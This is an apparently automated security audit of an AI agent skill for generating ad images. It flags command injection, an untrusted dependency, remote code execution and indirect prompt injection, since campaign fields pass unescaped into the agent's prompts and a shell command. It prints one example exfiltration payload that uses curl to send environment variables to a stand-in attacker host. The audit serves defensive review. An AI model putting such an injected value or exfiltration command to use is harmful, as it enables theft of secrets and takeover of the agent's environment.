generate-ad-images
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGH (COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, REMOTE_CODE_EXECUTION, PROMPT_INJECTION)
Full Analysis
- COMMAND_EXECUTION (HIGH): The instructions in SKILL.md (Steps 4 and 6) direct the agent to run a shell command: python scripts/generate_image.py --prompt "[your prompt]". Because [your prompt] is constructed from user-controlled parameters like creative_direction and target_audience, an attacker can provide inputs containing shell metacharacters (e.g., "; curl attacker.com/leak?d=$(env) #) to execute arbitrary commands.
- EXTERNAL_DOWNLOADS (MEDIUM): The scripts/requirements.txt file specifies the imagekitio package. This dependency does not originate from a trusted organization as defined in the [TRUST-SCOPE-RULE], making it an unverifiable third-party dependency.
- REMOTE_CODE_EXECUTION (HIGH): Successful exploitation of the command injection vulnerability in the shell execution workflow allows for full remote code execution on the environment running the agent.
- PROMPT_INJECTION (HIGH): The skill is highly vulnerable to indirect prompt injection (Category 8) due to its core design of processing untrusted campaign data and using it to drive command-line tools.
  - Ingestion points: Campaign parameters (product_or_service, target_audience, creative_direction, kpi) ingested in SKILL.md Step 1.
  - Boundary markers: None. User data is directly interpolated into prompts and shell arguments.
  - Capability inventory: Execution of scripts/generate_image.py, which has full network access to the Google Gemini and ImageKit APIs.
  - Sanitization: None. There is no logic to escape double quotes or shell-sensitive characters in the provided campaign data before processing.
Recommendations
- AI detected serious security threats
Audit Metadata